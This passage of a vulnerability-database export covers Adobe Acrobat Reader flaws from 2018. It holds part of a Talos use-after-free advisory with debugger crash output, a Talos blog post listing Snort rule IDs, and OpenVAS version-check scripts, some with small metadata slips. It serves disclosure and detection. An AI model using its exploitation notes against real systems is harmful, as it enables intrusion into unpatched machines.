of memory is subsequently freed but is later reused resulting in a crash:\n \n \n (c20.5e8): Access violation - code c0000005 (first chance)\n First chance exceptions are reported before any exception handling.\n This exception may be expected and handled.\n eax=17d2acb8 ebx=29d26fe0 ecx=29d26fe0 edx=771f6c74 esi=292c2fd8 edi=292c2fd0\n eip=558e2961 esp=0018eee8 ebp=0018eef8 iopl=0 nv up ei pl zr na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\n Annots!PlugInMain+0x9ea60:\n 558e2961 ff7318 push dword ptr [ebx+18h] ds:0023:29d26ff8=????????\n 0:000> dd ebx\n 29d26fe0 ???????? ???????? ???????? ????????\n 29d26ff0 ???????? ???????? ???????? ????????\n 29d27000 ???????? ???????? ???????? ????????\n 29d27010 ???????? ???????? ???????? ????????\n 29d27020 ???????? ???????? ???????? ????????\n 29d27030 ???????? ???????? ???????? ????????\n 29d27040 ???????? ???????? ???????? ????????\n 29d27050 ???????? ???????? ???????? ????????\n \n\nWith page heap disabled, this stale pointer dereference will usually succeed and result in further memory corruption. With proper memory layout manipulation, it could be abused to achieve arbitrary code execution.\n\nDo note that in order for the PoC to trigger this memory corruption, the PoC file needs to be added to trusted locations list in \u201cSecurity(Enhanced)\u201d in preferences.\n\n### Timeline\n\n2018-01-23 - Vendor Disclosure \n2018-05-15 - Public Release\n\n##### Credit\n\nDiscovered by Aleksandar Nikolic of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2018-0518\n\nPrevious Report\n\nTALOS-2017-0501\n", "edition": 6, "modified": "2018-05-15T00:00:00", "published": "2018-05-15T00:00:00", "id": "TALOS-2018-0517", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0517", "title": "Adobe Acrobat Reader DC Net.Discovery.queryServices Remote Code Execution Vulnerability", "type": "talos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2018-05-15T21:13:57", "bulletinFamily": "blog", "cvelist": ["CVE-2018-4947", "CVE-2018-4996"], "description": "_Discovered by Aleksandar Nikolic of Cisco Talos_ \n \n_Update 05/15/18_: The CVE for TALOS-2018-0517 has been corrected below. \n\n\n## Overview\n\n \nToday, Talos is releasing details of a new vulnerabilities within Adobe Acrobat Reader DC. Adobe Acrobat Reader is the most popular and most feature-rich PDF reader. It has a big user base, is usually a default PDF reader on systems and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability. \n \nA specific Javascript script embedded in a PDF file can cause the document ID field to be used in an unbounded copy operation leading to stack-based buffer overflow when opening a specially crafted PDF document in Adobe Acrobat Reader DC 2018.009.20044. This stack overflow can lead to return address overwrite which can result in arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page. \n \n\n\n### TALOS-2018-0517 - Adobe Acrobat Reader DC Net.Discovery.queryServices Remote Code Execution Vulnerability (CVE-2018-4996)\n\n \nA specific Javascript script embedded in a PDF file can lead to a pointer to previously freed object to be reused when opening a PDF document in Adobe Acrobat Reader DC 2018.009.20044. With careful memory manipulation, this can potentially lead to sensitive memory disclosure or arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page. Detailed vulnerability information can be found [here](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0517>). \n \n\n\n### TALOS-2018-0518 - Adobe Acrobat Reader DC ANFancyAlertImpl Remote Code Execution Vulnerability (CVE-2018-4947)\n\n \nA specific Javascript script embedded in a PDF file can lead to a pointer to previously freed object to be reused when opening a PDF document in Adobe Acrobat Reader DC 2018.009.20044. With careful memory manipulation, this can potentially lead to sensitive memory disclosure or arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page. Detailed vulnerability information can be found [here](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0518>). \n \n\n\n## Known vulnerable versions\n\n \nAdobe Acrobat Reader DC 2018.009.20044 \n \n\n\n## Coverage\n\n \nThe following Snort Rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org. \n \nSnort Rules: 45506-45507, 45521-45522 \n \n\n\n[](<http://feeds.feedburner.com/~ff/feedburner/Talos?a=wlCWZuun2rs:EsJhBSnRcIM:yIl2AUoC8zA>)\n\n", "modified": "2018-05-15T20:38:52", "published": "2018-05-15T06:51:00", "id": "TALOSBLOG:C087C65FAEEB57D382F9DD6FD51D549C", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/wlCWZuun2rs/multiple-acrobat-reader-vulns.html", "type": "talosblog", "title": "Vulnerability Spotlight: Multiple Adobe Acrobat Reader DC Vulnerabilities", "cvss": {"score": 0.0, "vector": "NONE"}}], "openvas": [{"lastseen": "2019-07-17T14:17:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "description": "This host is installed with Adobe Acrobat 2017\n and is prone to multiple vulnerabilities.", "modified": "2019-07-16T00:00:00", "published": "2018-05-15T00:00:00", "id": "OPENVAS:1361412562310813230", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813230", "type": "openvas", "title": "Adobe Acrobat 2017 Security Updates(apsb18-09)-Windows", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Acrobat 2017 Security Updates(apsb18-09)-Windows\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813230\");\n script_version(\"2019-07-16T10:51:36+0000\");\n script_cve_id(\"CVE-2018-4990\", \"CVE-2018-4947\", \"CVE-2018-4948\", \"CVE-2018-4966\",\n \"CVE-2018-4968\", \"CVE-2018-4978\", \"CVE-2018-4982\", \"CVE-2018-4984\",\n \"CVE-2018-4996\", \"CVE-2018-4952\", \"CVE-2018-4954\", \"CVE-2018-4958\",\n \"CVE-2018-4959\", \"CVE-2018-4961\", \"CVE-2018-4971\", \"CVE-2018-4974\",\n \"CVE-2018-4977\", \"CVE-2018-4980\", \"CVE-2018-4983\", \"CVE-2018-4988\",\n \"CVE-2018-4989\", \"CVE-2018-4950\", \"CVE-2018-4979\", \"CVE-2018-4949\",\n \"CVE-2018-4951\", \"CVE-2018-4955\", \"CVE-2018-4956\", \"CVE-2018-4957\",\n \"CVE-2018-4962\", \"CVE-2018-4963\", \"CVE-2018-4964\", \"CVE-2018-4967\",\n \"CVE-2018-4969\", \"CVE-2018-4970\", \"CVE-2018-4972\", \"CVE-2018-4973\",\n \"CVE-2018-4975\", \"CVE-2018-4976\", \"CVE-2018-4981\", \"CVE-2018-4986\",\n \"CVE-2018-4985\", \"CVE-2018-4953\", \"CVE-2018-4987\", \"CVE-2018-4965\",\n \"CVE-2018-4993\", \"CVE-2018-4995\", \"CVE-2018-4960\", \"CVE-2018-12812\",\n \"CVE-2018-12815\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-16 10:51:36 +0000 (Tue, 16 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-15 12:13:36 +0530 (Tue, 15 May 2018)\");\n script_name(\"Adobe Acrobat 2017 Security Updates(apsb18-09)-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Acrobat 2017\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to double\n Free, heap overflow, use-after-free, out-of-bounds write, security bypass,\n out-of-bounds read, type confusion, untrusted pointer dereference, memory\n corruption, NTLM SSO hash theft and HTTP POST new line injection via XFA\n submission errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to bypass security, disclose information and run arbitrary code in the\n context of the current user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Acrobat 2017 before 2017.011.30080 on\n MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Acrobat 2017 version\n 2017.011.30080 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Acrobat/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_in_range(version:vers, test_version:\"17.0\", test_version2:\"17.011.30079\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"17.011.30080 (2017.011.30080)\", install_path:path);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-17T14:18:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "description": "This host is installed with Adobe Acrobat DC\n (Classic Track) and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-05-15T00:00:00", "id": "OPENVAS:1361412562310813239", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813239", "type": "openvas", "title": "Adobe Acrobat DC (Classic Track) Security Updates (apsb18-09) - Mac OS X", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Acrobat DC (Classic Track) Security Updates (apsb18-09)-MAC OS X\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_dc_classic\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813239\");\n script_version(\"2019-07-05T08:21:18+0000\");\n script_cve_id(\"CVE-2018-4990\", \"CVE-2018-4947\", \"CVE-2018-4948\", \"CVE-2018-4966\",\n \"CVE-2018-4968\", \"CVE-2018-4978\", \"CVE-2018-4982\", \"CVE-2018-4984\",\n \"CVE-2018-4996\", \"CVE-2018-4952\", \"CVE-2018-4954\", \"CVE-2018-4958\",\n \"CVE-2018-4959\", \"CVE-2018-4961\", \"CVE-2018-4971\", \"CVE-2018-4974\",\n \"CVE-2018-4977\", \"CVE-2018-4980\", \"CVE-2018-4983\", \"CVE-2018-4988\",\n \"CVE-2018-4989\", \"CVE-2018-4950\", \"CVE-2018-4979\", \"CVE-2018-4949\",\n \"CVE-2018-4951\", \"CVE-2018-4955\", \"CVE-2018-4956\", \"CVE-2018-4957\",\n \"CVE-2018-4962\", \"CVE-2018-4963\", \"CVE-2018-4964\", \"CVE-2018-4967\",\n \"CVE-2018-4969\", \"CVE-2018-4970\", \"CVE-2018-4972\", \"CVE-2018-4973\",\n \"CVE-2018-4975\", \"CVE-2018-4976\", \"CVE-2018-4981\", \"CVE-2018-4986\",\n \"CVE-2018-4985\", \"CVE-2018-4953\", \"CVE-2018-4987\", \"CVE-2018-4965\",\n \"CVE-2018-4993\", \"CVE-2018-4995\", \"CVE-2018-4960\", \"CVE-2018-12812\",\n \"CVE-2018-12815\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:21:18 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-15 12:13:55 +0530 (Tue, 15 May 2018)\");\n script_name(\"Adobe Acrobat DC (Classic Track) Security Updates (apsb18-09) - Mac OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Acrobat DC\n (Classic Track) and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to double\n Free, heap overflow, use-after-free, out-of-bounds write, security bypass,\n out-of-bounds read, type confusion, untrusted pointer dereference, memory\n corruption, NTLM SSO hash theft and HTTP POST new line injection via XFA\n submission errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to bypass security, disclose information and run arbitrary code in the\n context of the current user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Acrobat DC (Classic Track)\n 2015.006.30418 and earlier versions on MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Acrobat DC (Classic Track)\n version 2015.006.30418 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_acrobat_dc_classic_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/AcrobatDC/Classic/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_is_less(version:vers, test_version:\"15.006.30418\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"15.006.30418 (2015.006.30418)\", install_path:path);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-17T14:18:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "description": "This host is installed with Adobe Reader 2017\n and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-05-15T00:00:00", "id": "OPENVAS:1361412562310813231", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813231", "type": "openvas", "title": "Adobe Reader 2017 Security Updates(apsb18-09)-Windows", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Reader 2107 Security Updates(apsb18-09)-Windows\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_reader\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813231\");\n script_version(\"2019-07-05T08:56:43+0000\");\n script_cve_id(\"CVE-2018-4990\", \"CVE-2018-4947\", \"CVE-2018-4948\", \"CVE-2018-4966\",\n \"CVE-2018-4968\", \"CVE-2018-4978\", \"CVE-2018-4982\", \"CVE-2018-4984\",\n \"CVE-2018-4996\", \"CVE-2018-4952\", \"CVE-2018-4954\", \"CVE-2018-4958\",\n \"CVE-2018-4959\", \"CVE-2018-4961\", \"CVE-2018-4971\", \"CVE-2018-4974\",\n \"CVE-2018-4977\", \"CVE-2018-4980\", \"CVE-2018-4983\", \"CVE-2018-4988\",\n \"CVE-2018-4989\", \"CVE-2018-4950\", \"CVE-2018-4979\", \"CVE-2018-4949\",\n \"CVE-2018-4951\", \"CVE-2018-4955\", \"CVE-2018-4956\", \"CVE-2018-4957\",\n \"CVE-2018-4962\", \"CVE-2018-4963\", \"CVE-2018-4964\", \"CVE-2018-4967\",\n \"CVE-2018-4969\", \"CVE-2018-4970\", \"CVE-2018-4972\", \"CVE-2018-4973\",\n \"CVE-2018-4975\", \"CVE-2018-4976\", \"CVE-2018-4981\", \"CVE-2018-4986\",\n \"CVE-2018-4985\", \"CVE-2018-4953\", \"CVE-2018-4987\", \"CVE-2018-4965\",\n \"CVE-2018-4993\", \"CVE-2018-4995\", \"CVE-2018-4960\", \"CVE-2018-12812\",\n \"CVE-2018-12815\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:56:43 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-15 12:13:36 +0530 (Tue, 15 May 2018)\");\n script_name(\"Adobe Reader 2017 Security Updates(apsb18-09)-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Reader 2017\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to double\n Free, heap overflow, use-after-free, out-of-bounds write, security bypass,\n out-of-bounds read, type confusion, untrusted pointer dereference, memory\n corruption, NTLM SSO hash theft and HTTP POST new line injection via XFA\n submission errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to bypass security, disclose information and run arbitrary code in the\n context of the current user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Acrobat Reader 2017 prior to version\n 2017.011.30080 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Acrobat Reader 2017 version\n 2017.011.30080 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Reader/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_in_range(version:vers, test_version:\"17.0\", test_version2:\"17.011.30079\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"2017.011.30080\", install_path:path);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-17T14:17:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "description": "This host is installed with Adobe Acrobat DC\n (Classic Track) and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-05-15T00:00:00", "id": "OPENVAS:1361412562310813238", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813238", "type": "openvas", "title": "Adobe Acrobat DC (Classic Track) Security Updates (apsb18-09) - Windows", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Acrobat DC (Classic Track) Security Updates (apsb18-09)-Windows\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_dc_classic\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813238\");\n script_version(\"2019-07-05T08:21:18+0000\");\n script_cve_id(\"CVE-2018-4990\", \"CVE-2018-4947\", \"CVE-2018-4948\", \"CVE-2018-4966\",\n \"CVE-2018-4968\", \"CVE-2018-4978\", \"CVE-2018-4982\", \"CVE-2018-4984\",\n \"CVE-2018-4996\", \"CVE-2018-4952\", \"CVE-2018-4954\", \"CVE-2018-4958\",\n \"CVE-2018-4959\", \"CVE-2018-4961\", \"CVE-2018-4971\", \"CVE-2018-4974\",\n \"CVE-2018-4977\", \"CVE-2018-4980\", \"CVE-2018-4983\", \"CVE-2018-4988\",\n \"CVE-2018-4989\", \"CVE-2018-4950\", \"CVE-2018-4979\", \"CVE-2018-4949\",\n \"CVE-2018-4951\", \"CVE-2018-4955\", \"CVE-2018-4956\", \"CVE-2018-4957\",\n \"CVE-2018-4962\", \"CVE-2018-4963\", \"CVE-2018-4964\", \"CVE-2018-4967\",\n \"CVE-2018-4969\", \"CVE-2018-4970\", \"CVE-2018-4972\", \"CVE-2018-4973\",\n \"CVE-2018-4975\", \"CVE-2018-4976\", \"CVE-2018-4981\", \"CVE-2018-4986\",\n \"CVE-2018-4985\", \"CVE-2018-4953\", \"CVE-2018-4987\", \"CVE-2018-4965\",\n \"CVE-2018-4993\", \"CVE-2018-4995\", \"CVE-2018-4960\", \"CVE-2018-12812\",\n \"CVE-2018-12815\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:21:18 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-15 12:13:55 +0530 (Tue, 15 May 2018)\");\n script_name(\"Adobe Acrobat DC (Classic Track) Security Updates (apsb18-09) - Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Acrobat DC\n (Classic Track) and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to double\n Free, heap overflow, use-after-free, out-of-bounds write, security bypass,\n out-of-bounds read, type confusion, untrusted pointer dereference, memory\n corruption, NTLM SSO hash theft and HTTP POST new line injection via XFA\n submission errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to bypass security, disclose information and run arbitrary code in the\n context of the current user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Acrobat DC (Classic Track)\n 2015.006.30418 and earlier versions on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Acrobat DC (Classic Track)\n version 2015.006.30418 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_acrobat_dc_classic_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/AcrobatDC/Classic/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_is_less(version:vers, test_version:\"15.006.30418\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"15.006.30418 (2015.006.30418)\", install_path:path);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": 